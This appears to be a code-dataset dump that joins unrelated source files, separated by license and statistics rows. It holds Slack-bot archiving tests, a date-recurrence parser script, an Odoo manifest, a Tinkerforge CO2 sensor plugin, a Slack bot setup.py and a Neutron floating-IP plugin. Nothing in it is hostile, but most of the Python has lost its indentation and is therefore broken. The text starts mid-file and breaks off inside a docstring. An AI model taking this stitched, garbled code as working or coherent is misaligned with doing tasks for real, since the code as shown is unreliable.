self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertFalse(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_users_ignored(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_a_dolphin_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": ":dolphin:",
"ts": "1355517523.000005"
}
]
self.destalinator.get_messages = mock.MagicMock(return_value=messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_an_attachment_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=[m for m in sample_slack_messages if 'attachments' in m])
self.assertFalse(self.destalinator.stale('stalinists', 30))
class DestalinatorArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_ignored_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_when_destalinator_not_activated(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=False)
mock_slacker.post_message.return_value = {}
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_closure_with_closure_text(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.get_channel_member_names.return_value = ['sridhar', 'jane']
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', mock.ANY, message_type='channel_archive'),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_members_at_channel_closing(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
names = ['sridhar', 'jane']
mock_slacker.get_channel_member_names.return_value = names
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', MockValidator(lambda s: all(name in s for name in names)), message_type=mock.ANY),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.archive("stalinists")
mock_slacker.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_channel_with_only_restricted_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.channel_has_only_restricted_members.return_value = True
self.destalinator.safe_archive("stalinists")
self.assertFalse(mock_slacker.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_archiving_if_before_earliest_archive_date(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
today = date.today()
        self.destalinator.earliest_archive_date = today + timedelta(days=1)
self.destalinator.safe_archive("stalinists")
self.assertFalse(self.destalinator.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.safe_archive("stalinists")
self.destalinator.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveAllTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_stale_once_for_each_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
self.destalinator.stale = mock.MagicMock(return_value=False)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive_all(days)
self.assertEqual(self.destalinator.stale.mock_calls, [mock.call('leninists', days), mock.call('stalinists', days)])
@mock.patch('tests.test_destalinator.SlackerMock')
def test_only_archives_stale_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive = mock.MagicMock()
self.destalinator.safe_archive_all(days)
self.destalinator.safe_archive.assert_called_once_with('leninists')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_archive_ignored_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['leninists']
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.earliest_archive_date = date.today()
self.destalinator.safe_archive_all(self.destalinator.config.archive_threshold)
self.assertFalse(mock_slacker.archive.called)
class DestalinatorWarnTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_warns_by_posting_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.destalinator.warn("stalinists", 30)
mock_slacker.post_message.assert_called_with("stalinists", self.destalinator.warning_text, message_type='channel_warning')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text,
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_with_changed_text_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text + "Some new stuff",
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,137,686,970,157,095,000 | 48.113462 | 130 | 0.673519 | false | 3.462915 | true | false | false |
UpOut/UpOutDF | test.py | 1 | 2268 | from upoutdf.parse import get_class
#test = "every month on last sunday,monday starting _October_15_2012_8:00PM ending _April_1_2014 at 8:00PM lasting 120 minutes in America/Los_Angeles"
#test = "every month day 4 starting _October_1_2013 ending _April_1_2014 at 8:00PM lasting 2 hours in America/Los_Angeles"
#test = "every weeks on tuesday,monday at 9:00PM lasting 6 hours in America/Los_Angeles"
test = "once starting _05/23/2015_08:00_PM ending _05/23/2015_11:00_PM in US/Pacific"
z = get_class(test)
def localize(time, timezone):
return timezone.normalize(time.astimezone(timezone))
z.verify()
z.parse()
print z.canonicalize()
#print z.occurences().__hash__()
#print "FROM HERE"
#for block in z.occurences().get_blocks():
# print block.__hash__()
# for o in block.get_occurences():
# pass
#print o.__hash__()
# print "\n\n"
#start = localize(start,z.timezone)
#end = localize(end,z.timezone)
#print start
#print start.isoweekday()
#print end
#print end.isoweekday()
#print "\n\n---"
"""
from upoutdf.snapping import SnapLogical
from dateutil import parser
import pytz
tz = pytz.timezone('America/Los_Angeles')
date = parser.parse("February 5, 2014")
date = tz.localize(date)
date = pytz.utc.normalize(date.astimezone(pytz.utc))
snapper = SnapLogical(tz)
print snapper.snap_to_month_weekday(date,5,'last')
"""
"""
FORMATS:
RECURRING:
every (int) <year(s) (day <int>)| month(s) on <<1st,2nd,3rd,4th,5th,last> <m,t,w,tr,f,sa,s> | day <int>> | week(s) on <m,t,w,tr,f,sa,s> | day(s)> (starting <datetimestring>) (ending <datetimestring>) (repeating <int> times) at <timestamp> lasting <int> <hours,minutes,seconds> in <timezone>
SINGLE:
once starting <datetimestring> ending <datetimestring> in America/Los_Angeles
Both starting and ending are inclusive
every [int] [years/months/weeks/days] [day][on] [dow] [int] starting [date] ending [date] at [time] lasting[hours]
every month on 3rd thursday at 9:00PM lasting 6 hours in America/Los_Angeles
3rd thursday of every month
At 9:00pm until 3AM
every 1 year at TIMESTAMP lasting 4 hours in America/Los_Angeles
every week starting TIMESTAMP ending TIMESTAMP at TIMESTAMP until TIMESTAMP in America/New_York_City
""" | mit | 8,324,564,143,246,006,000 | 29.253333 | 298 | 0.701499 | false | 2.842105 | false | false | false |
maljac/odoo-addons | report_extended_purchase/__openerp__.py | 1 | 1599 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Report Configurator - Purchase',
'version': '1.0',
'category': 'Reporting Subsystem',
'sequence': 14,
'summary': '',
'description': """
Report Configurator - Purchase
==============================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'report_extended',
'purchase',
],
'data': [
'views/report_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': True,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,613,577,968,119,786,000 | 30.98 | 78 | 0.554096 | false | 4.037879 | false | false | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/co2_v2/co2_v2.py | 1 | 3550 | # -*- coding: utf-8 -*-
"""
CO2 2.0 Plugin
Copyright (C) 2019 Olaf Lüke <[email protected]>
co2_v2.py: CO2 2.0 Plugin Implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_co2_v2 import BrickletCO2V2
from brickv.plot_widget import PlotWidget, CurveValueWrapper
from brickv.callback_emulator import CallbackEmulator
class CO2V2(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletCO2V2, *args)
self.co2 = self.device
self.cbe_all_values = CallbackEmulator(self,
self.co2.get_all_values,
None,
self.cb_all_values,
self.increase_error_count)
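        # The callback emulator polls get_all_values (period configured in
        # start()/stop()) and forwards each result to cb_all_values; errors
        # are reported through increase_error_count.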
self.current_co2 = CurveValueWrapper() # int, ppm
self.current_temperature = CurveValueWrapper() # float, °C
self.current_humidity = CurveValueWrapper() # float, %RH
plots_co2 = [('CO2', Qt.red, self.current_co2, '{} PPM'.format)]
self.plot_widget_co2 = PlotWidget('CO2 [PPM]', plots_co2, y_resolution=1.0)
plots_temperature = [('Temperature', Qt.red, self.current_temperature, '{} °C'.format)]
self.plot_widget_temperature = PlotWidget('Temperature [°C]', plots_temperature, y_resolution=0.01)
plots_humidity = [('Relative Humidity', Qt.red, self.current_humidity, '{} %RH'.format)]
self.plot_widget_humidity = PlotWidget('Relative Humidity [%RH]', plots_humidity, y_resolution=0.01)
layout_plot1 = QHBoxLayout()
layout_plot1.addWidget(self.plot_widget_co2)
layout_plot2 = QHBoxLayout()
layout_plot2.addWidget(self.plot_widget_temperature)
layout_plot2.addWidget(self.plot_widget_humidity)
layout_main = QVBoxLayout(self)
layout_main.addLayout(layout_plot1)
layout_main.addLayout(layout_plot2)
def cb_all_values(self, values):
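        # CO2 concentration is used as-is (ppm); temperature and humidity
        # arrive as hundredths and are scaled to °C / %RH floats here.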
self.current_co2.value = values.co2_concentration
self.current_temperature.value = values.temperature / 100.0
self.current_humidity.value = values.humidity / 100.0
def start(self):
self.cbe_all_values.set_period(250)
self.plot_widget_co2.stop = False
self.plot_widget_temperature.stop = False
self.plot_widget_humidity.stop = False
def stop(self):
self.cbe_all_values.set_period(0)
self.plot_widget_co2.stop = True
self.plot_widget_temperature.stop = True
self.plot_widget_humidity.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletCO2V2.DEVICE_IDENTIFIER
| gpl-2.0 | 1,356,080,298,779,096,300 | 37.543478 | 108 | 0.666949 | false | 3.697602 | false | false | false |
dataloop/slactorbot | setup.py | 1 | 1466 | """
Slactorbot - A Python Slack Bot with hot patch!
"""
import os
import re
from setuptools import find_packages, setup
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def get_version():
VERSIONFILE = "slactorbot/_version.py"
verstrline = fread(VERSIONFILE).strip()
vsre = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(vsre, verstrline, re.M)
if mo:
VERSION = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." %
(VERSIONFILE, ))
return VERSION
dependencies = ['thespian', 'slackclient', 'pyyaml', 'requests']
setup(
name='slactorbot',
version=get_version(),
url='https://github.com/dataloop/slactorbot',
download_url="https://github.com/dataloop/slactorbot/tarball/v" + get_version(),
license="MIT",
author='Steven Acreman',
author_email='[email protected]',
description='A Python Slack Bot with hot patch!',
keywords="slack bot",
packages=find_packages(exclude=['tests']),
exclude_package_data={'': ['config.yaml']},
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
"slactorbot = slactorbot.bot:start",
],
},
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: System Administrators"
])
| mit | -8,639,457,963,312,591,000 | 27.192308 | 84 | 0.61869 | false | 3.490476 | false | false | false |
rackerlabs/quark | quark/plugin_modules/floating_ips.py | 1 | 24567 | # Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from quark import billing
from quark.db import api as db_api
from quark.db import ip_types
from quark.drivers import floating_ip_registry as registry
from quark import exceptions as q_exc
from quark import ipam
from quark import plugin_views as v
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
quark_router_opts = [
cfg.StrOpt('floating_ip_segment_name', default='floating_ip',
help=_('Segment name for floating IP subnets')),
cfg.StrOpt('floating_ip_ipam_strategy', default='ANY',
               help=_('Override the network IPAM strategy for floating '
"allocation. Use 'NETWORK' to fall back to the "
"network's strategy")),
]
CONF.register_opts(quark_router_opts, 'QUARK')
def _get_network(context, network_id):
network = db_api.network_find(context, id=network_id, scope=db_api.ONE)
if not network:
raise n_exc.NetworkNotFound(net_id=network_id)
return network
def _get_port(context, port_id):
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if not port.ip_addresses or len(port.ip_addresses) == 0:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
return port
def _get_fixed_ip(context, given_fixed_ip, port):
if not given_fixed_ip:
fixed_ip = _get_next_available_fixed_ip(port)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(
port_id=port.id)
else:
fixed_ip = next((ip for ip in port.ip_addresses
if (ip['address_readable'] == given_fixed_ip and
ip.get('address_type') == ip_types.FIXED)),
None)
if not fixed_ip:
raise q_exc.FixedIpDoesNotExistsForPort(
fixed_ip=given_fixed_ip, port_id=port.id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') in (ip_types.FLOATING,
ip_types.SCALING) and
ip.fixed_ip['address_readable'] == given_fixed_ip)):
raise q_exc.PortAlreadyContainsFloatingIp(
port_id=port.id)
return fixed_ip
def _allocate_ip(context, network, port, requested_ip_address, address_type):
new_addresses = []
ip_addresses = []
if requested_ip_address:
ip_addresses.append(requested_ip_address)
seg_name = CONF.QUARK.floating_ip_segment_name
strategy_name = CONF.QUARK.floating_ip_ipam_strategy
if strategy_name.upper() == 'NETWORK':
strategy_name = network.get("ipam_strategy")
port_id = port
if port:
port_id = port.id
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.allocate_ip_address(context, new_addresses, network.id,
port_id, CONF.QUARK.ipam_reuse_after,
seg_name, version=4,
ip_addresses=ip_addresses,
address_type=address_type)
return new_addresses[0]
def _get_next_available_fixed_ip(port):
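    # Pick the oldest-allocated fixed IP on the port that is not already
    # backing a floating or scaling IP; returns None if none is available.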
floating_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') in
(ip_types.FLOATING, ip_types.SCALING)]
fixed_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') == ip_types.FIXED]
if not fixed_ips or len(fixed_ips) == 0:
return None
used = [ip.fixed_ip.address for ip in floating_ips
if ip and ip.fixed_ip]
return next((ip for ip in sorted(fixed_ips,
key=lambda ip: ip.get('allocated_at'))
if ip.address not in used), None)
def _get_ips_by_type(context, ip_type, filters=None, fields=None):
filters = filters or {}
filters['_deallocated'] = False
filters['address_type'] = ip_type
ips = db_api.floating_ip_find(context, scope=db_api.ALL, **filters)
return ips
def _create_flip(context, flip, port_fixed_ips):
"""Associates the flip with ports and creates it with the flip driver
:param context: neutron api request context.
:param flip: quark.db.models.IPAddress object representing a floating IP
:param port_fixed_ips: dictionary of the structure:
{"<id of port>": {"port": <quark.db.models.Port>,
"fixed_ip": "<fixed ip address>"}}
:return: None
"""
if port_fixed_ips:
context.session.begin()
try:
ports = [val['port'] for val in port_fixed_ips.values()]
flip = db_api.port_associate_ip(context, ports, flip,
port_fixed_ips.keys())
for port_id in port_fixed_ips:
fixed_ip = port_fixed_ips[port_id]['fixed_ip']
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
flip_driver.register_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# alexm: Notify from this method for consistency with _delete_flip
billing.notify(context, 'ip.associate', flip)
def _get_flip_fixed_ip_by_port_id(flip, port_id):
for fixed_ip in flip.fixed_ips:
if fixed_ip.ports[0].id == port_id:
return fixed_ip
def _update_flip(context, flip_id, ip_type, requested_ports):
"""Update a flip based IPAddress
:param context: neutron api request context.
:param flip_id: id of the flip or scip
:param ip_type: ip_types.FLOATING | ip_types.SCALING
:param requested_ports: dictionary of the structure:
{"port_id": "<id of port>", "fixed_ip": "<fixed ip address>"}
:return: quark.models.IPAddress
"""
# This list will hold flips that require notifications.
# Using sets to avoid dups, if any.
notifications = {
'ip.associate': set(),
'ip.disassociate': set()
}
context.session.begin()
try:
flip = db_api.floating_ip_find(context, id=flip_id, scope=db_api.ONE)
if not flip:
if ip_type == ip_types.SCALING:
raise q_exc.ScalingIpNotFound(id=flip_id)
raise q_exc.FloatingIpNotFound(id=flip_id)
current_ports = flip.ports
# Determine what ports are being removed, being added, and remain
req_port_ids = [request_port.get('port_id')
for request_port in requested_ports]
curr_port_ids = [curr_port.id for curr_port in current_ports]
added_port_ids = [port_id for port_id in req_port_ids
if port_id and port_id not in curr_port_ids]
removed_port_ids = [port_id for port_id in curr_port_ids
if port_id not in req_port_ids]
remaining_port_ids = set(curr_port_ids) - set(removed_port_ids)
# Validations just for floating ip types
if (ip_type == ip_types.FLOATING and curr_port_ids and
curr_port_ids == req_port_ids):
d = dict(flip_id=flip_id, port_id=curr_port_ids[0])
raise q_exc.PortAlreadyAssociatedToFloatingIp(**d)
if (ip_type == ip_types.FLOATING and
not curr_port_ids and not req_port_ids):
raise q_exc.FloatingIpUpdateNoPortIdSupplied()
port_fixed_ips = {}
# Keep the ports and fixed ips that have not changed
for port_id in remaining_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
# Disassociate the ports and fixed ips from the flip that were
# associated to the flip but are not anymore
for port_id in removed_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
flip = db_api.port_disassociate_ip(context, [port], flip)
notifications['ip.disassociate'].add(flip)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
if fixed_ip:
flip = db_api.floating_ip_disassociate_fixed_ip(
context, flip, fixed_ip)
# Validate the new ports with the flip and associate the new ports
# and fixed ips with the flip
for port_id in added_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.FLOATING)):
raise q_exc.PortAlreadyContainsFloatingIp(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.SCALING)):
raise q_exc.PortAlreadyContainsScalingIp(port_id=port_id)
fixed_ip = _get_next_available_fixed_ip(port)
LOG.info('new fixed ip: %s' % fixed_ip)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
flip = db_api.port_associate_ip(context, [port], flip, [port_id])
notifications['ip.associate'].add(flip)
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
# If there are not any remaining ports and no new ones are being added,
# remove the floating ip from unicorn
if not remaining_port_ids and not added_port_ids:
flip_driver.remove_floating_ip(flip)
# If new ports are being added but there previously was not any ports,
# then register a new floating ip with the driver because it is
# assumed it does not exist
elif added_port_ids and not curr_port_ids:
flip_driver.register_floating_ip(flip, port_fixed_ips)
else:
flip_driver.update_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# Send notifications for possible associate/disassociate events
for notif_type, flip_set in notifications.iteritems():
for flip in flip_set:
billing.notify(context, notif_type, flip)
# NOTE(blogan): ORM does not seem to update the model to the real state
# of the database, so I'm doing an explicit refresh for now.
context.session.refresh(flip)
return flip
def _delete_flip(context, id, address_type):
filters = {'address_type': address_type, '_deallocated': False}
flip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE, **filters)
if not flip:
raise q_exc.FloatingIpNotFound(id=id)
current_ports = flip.ports
if address_type == ip_types.FLOATING:
if current_ports:
current_ports = [flip.ports[0]]
elif address_type == ip_types.SCALING:
current_ports = flip.ports
context.session.begin()
try:
strategy_name = flip.network.get('ipam_strategy')
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.deallocate_ip_address(context, flip)
if current_ports:
db_api.port_disassociate_ip(context, current_ports, flip)
if flip.fixed_ips:
db_api.floating_ip_disassociate_all_fixed_ips(context, flip)
context.session.commit()
except Exception:
context.session.rollback()
raise
try:
driver = registry.DRIVER_REGISTRY.get_driver()
driver.remove_floating_ip(flip)
except Exception as e:
LOG.error('There was an error when trying to delete the floating ip '
'on the unicorn API. The ip has been cleaned up, but '
'may need to be handled manually in the unicorn API. '
'Error: %s' % e.message)
# alexm: Notify from this method because we don't have the flip object
# in the callers
billing.notify(context, 'ip.disassociate', flip)
def create_floatingip(context, content):
"""Allocate or reallocate a floating IP.
:param context: neutron api request context.
:param content: dictionary describing the floating ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
network_id = content.get('floating_network_id')
# TODO(blogan): Since the extension logic will reject any requests without
# floating_network_id, is this still needed?
if not network_id:
raise n_exc.BadRequest(resource='floating_ip',
msg='floating_network_id is required.')
fixed_ip_address = content.get('fixed_ip_address')
ip_address = content.get('floating_ip_address')
port_id = content.get('port_id')
port = None
port_fixed_ip = {}
network = _get_network(context, network_id)
if port_id:
port = _get_port(context, port_id)
fixed_ip = _get_fixed_ip(context, fixed_ip_address, port)
port_fixed_ip = {port.id: {'port': port, 'fixed_ip': fixed_ip}}
flip = _allocate_ip(context, network, port, ip_address, ip_types.FLOATING)
_create_flip(context, flip, port_fixed_ip)
return v._make_floating_ip_dict(flip, port_id)
def update_floatingip(context, id, content):
"""Update an existing floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
if 'port_id' not in content:
raise n_exc.BadRequest(resource='floating_ip',
msg='port_id is required.')
requested_ports = []
if content.get('port_id'):
requested_ports = [{'port_id': content.get('port_id')}]
flip = _update_flip(context, id, ip_types.FLOATING, requested_ports)
return v._make_floating_ip_dict(flip)
def delete_floatingip(context, id):
"""deallocate a floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
"""
LOG.info('delete_floatingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.FLOATING)
def get_floatingip(context, id, fields=None):
"""Retrieve a floating IP.
:param context: neutron api request context.
:param id: The UUID of the floating IP.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_floatingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.FLOATING, '_deallocated': False}
floating_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not floating_ip:
raise q_exc.FloatingIpNotFound(id=id)
return v._make_floating_ip_dict(floating_ip)
def get_floatingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of floating ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a floating ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
